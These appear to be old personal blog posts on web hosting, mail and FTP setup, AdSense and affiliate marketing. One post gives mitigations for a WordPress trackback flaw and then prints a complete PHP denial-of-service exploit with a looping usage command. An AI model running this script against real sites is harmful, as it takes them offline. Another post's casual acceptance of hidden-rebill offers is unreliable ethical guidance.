When a person links to your site, they may simple link to http://example.com. Another person may link to http://www.example.com. This would be like looking at money.cnn.com vs www.cnn.com. Google treats these as different websites and can be harmful to the overall rankings for your site. It is generally a good idea to decide if you want to redirect non www to www.

The solution to this is a rather easy htaccess rule. To setup a htaccess rule you would create a file called .htaccess in the root folder of your website, sometimes referred to public_html/, or htdocs/.

To enable mod_rewrite, enter this line first if it doesn’t exist already:

RewriteEngine on

Then you would put this below:
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

The first line reads the HTTP_HOST, and determines of the first 3 characters are www or not. If they are not, it continues onto the second line.

The second line takes the HTTP_HOST requested initially, and simply adds www. to it. The R=301 says that this is a HTTP code 301 permanent redirect, and the L tells the code to stop the rewriting process here and don’t apply any more rewrite rules.

To sum it up, a simple .htaccess file to redirect non www to www would be:

RewriteEngine on
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

It is also possible to redirect www.example.com to example.com. The code below will do that:
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

I hope this simple mod_rewrite rule will help when you decide to redirect non www urls to www, or the other way around.

The general definition of smart pricing is when you earn a very small amount per click. Many times much lower than expected, or you previously earned. The penalty has been reported upwards of 90% loss in earnings per click. Often you can even go through your adsense earning history to find when it happened, as it’s quite apparent when you know what you are looking for.

If you are a “victim” of smart pricing it can be very frustrating trying to work your way out of it. When I put victim in quotes, I mean that many webmasters, whether they know it or not, get themselves into the situation. Although this isn’t always the case.

One industry I have experience in is the proxy industry. There are many people that do anything they can to ‘trick’ users into clicking on ads. In the short term this may increase your revenue, as you’re sending more clicks Google’s way. But in the long run, it will get you smart priced. Google will see that the clicks coming from your site are not converting, and are of overall low quality (bounce rate, time on site, etc).

What should you do to prevent being smart priced, or even fix it if it happens? Well it’s simple, rearrange your sites to still clearly display ads to users, but let them choose to click them. This will help you send only interested visitors to Google’s ad network. Rumor has it that smart pricing is re-evaluated near weekly.

Now, keep in mind that all this information is just what I’ve gained from experience. It is by no way dead facts, but it makes sense to me. I’d appreciate any thoughts on the matters in the comments. Now go make that money!

http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx

All it takes is a few seconds, and the money generated can go a long way to help people in need.

More information can be found here: http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna

I’d just like to say that if you made it here searching for that guy, I’m not him.

I’m a 24 (25 in a couple days) year old IT geek from Minnesota, not a manager for a hedge fund committing suspected insider trading.

Here’s the results from a quick test against my server:

13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24

Very dirty.

Here’s a temporary fix that can be implemented until we get a real patch.

Add the following lines to your Apache 2 config file:
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
This should be placed in the main config, not a virtual hosts config. This will disable any URLs with “wp-trackback.php” in it. This is a quick and ugly fix, but will help against this attack.

I expect WordPress will have an update soon.

UPDATE: With the help of a friend we have created a quick fix:

In line #47 of wp-trackback.php, add this:

if(strlen($charset) > 50)
die;

Here’s the actual exploit.

<?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* security@wordpress.org contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org>
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) < 2)
die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
$path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
$fp = @fsockopen($data['host'],80);
if(!$fp)
die("unable to connect to: ".$data['host']."\n");
$pid[$n] = pcntl_fork();
if(!$pid[$n]){
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n");
echo "hit!\n";
}
}
?>

First, setup your /etc/maildroprc file:

# commands and variables for making the mail directories
maildirmake=/usr/bin/maildirmake
mkdir=/bin/mkdir
rmdir=/bin/rmdir
MAILDIR=$DEFAULT

# make the user's mail directory if it doesn't exist
`test -e $MAILDIR`
if ($RETURNCODE != 0)
{
`$mkdir -p $MAILDIR`
`$rmdir $MAILDIR`
`$maildirmake $MAILDIR`
}

# make the .Junk folder if it doesn't exist
JUNK_FOLDER=.Junk
_JUNK_DEST=$MAILDIR/$JUNK_FOLDER/
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0 )
{
`$maildirmake $_JUNK_DEST`
#auto subscribe. the following works for courier-imap
`echo INBOX.Junk >> $MAILDIR/courierimapsubscribed`
}

# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
{
exception {
to $DEFAULT/.Junk/
}
}

The comments clearly state what’s going on there.

Once that’s setup, you will go into your /etc/postfix/master.cf and make sure the

maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}

is not commented out.

Next you will have to set the /usr/bin/maildrop file setuid root. This is so maildrop can interact with authdaemon and the mail folders.

#chmod +s /usr/bin/maildrop

The last thing you have to do is add this to your /etc/postfix/main.cf file:

virtual_transport = maildrop
maildrop_destination_recipient_limit = 1

If there is another virtual_transport line, be sure to comment that out first.

And that’s all. Nice and simple way to handle all that Junk mail.

I thought I’d write up a quick how to on how to configure Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in hope someone else will be able to put it to use.  And here we go..

Enable PureDB authentication:

# cd /etc/pure-ftpd/auth

# ln -s ../conf/PureDB 50pure

To disable PAM authentication and UNIX authentication so you only have virtual users:
# echo no > /etc/pure-ftpd/conf/PAMAuthentication

# echo no > /etc/pure-ftpd/conf/UnixAuthentication

That’s it.  Simple, but when coming from a single config file, this isn’t at all intuitive – at least to me.

I’ve always recommended Pure-FTPD for it’s security, features, and simplicity.  You can find out more information at the official Pure-FTPD projects website: www.Pure-FTPD.org

But I have managed to run into an affiliate network that has been very helpful in getting me setup with a campaign.  I’m currently running some Facebook ads for a simple free signup.  Low payout, but also low cost to advertise.  It’s pretty exciting, and I’m hoping to simply generate some revenue I can invest into some bigger offers.  I’d love to share all the details, but I’m not at the point where I can afford to, or know enough about it to be more useful than the many other sites talking about it.  One being nickycakes.com.

The campaign really wasn’t anything to brag about.  Simply making $10 on a $80 investment.  But for me it’s a relief to finally break even, let alone make money.  Well, let’s hope the earnings go up from here.

Blogging to myself is a blast!  Haha, no.  Blogging is kind of entertaining, but not really my thing.  I’m going to take a step back, and focus less on posting regularly.  What’s the point, right?  When the traffic picks up, or I come up with some really good post ideas, I wont hesitate to post.

And I’m out.

That was until I read through a blog called Nickycakes.  The title of the blog is Reformed Blackhat, which seemed interesting.  I ended up at the newbie affiliate marketing section – and boy did it peak my interest.  This guy has an attitude I like, gets straight to the point, and opened up a whole new way of making money online for me.

After reading through the entire guide, I decided I would give affiliate marketing a shot.  Essentially what you do is create a page, or landing page, and send traffic to it.  The goal of the landing page is to convince the user to sign up/buy/do whatever for your product.  These can be anywhere from simple ad looking pages, to review sites, or even flogs (fake blogs).  The whole idea of it seems real interesting so I started right up.

Turns out it is a lot more shady than I had expected.  A lot of money is made on rebills (billing someone after the initial $2 or whatever), generally without their knowledge.  Terms of Service stating the rebill is hidden at the bottom of the page or anywhere out of sight.  Most of the products are sub par, and a Google search reveals them to be mostly a scam.

Now I personally wouldn’t be opposed to promoting some of the products, as it’s not like you’re stealing.  Technically the terms are explained to them.  It’s like the offer is an IQ test in iteself (one of the products offered).  If they don’t sign up, average to above average IQ, but if they do – they fail the IQ test.  Haha.  But this is only one method of affiliate marketing.

One other type of affiliate marketing I’ve began to explore is local affiliate marketing.  You don’t sell a product hundreds, if not thousands, of others are selling online.  You sell local products/services that local businesses provide.  This, in my opinion, is a lot more ethical – and even has a chance to earn a lot more money.

Simply contact businesses and setup relations to sell products for them.  I am three days into my first campaign of local affiliate marketing, and experimenting with PPC advertising and some SEO advertising.  Nothing interesting to report, as the 20 people total who went to my landing page so far aren’t a good display of the results I should expect.  It’s fun and interesting though.  The potential is there, it’s just making it work.

For more information on local affiliate marketing, check out: http://www.shoemoney.com/2008/11/04/making-money-with-local-affiliate-programs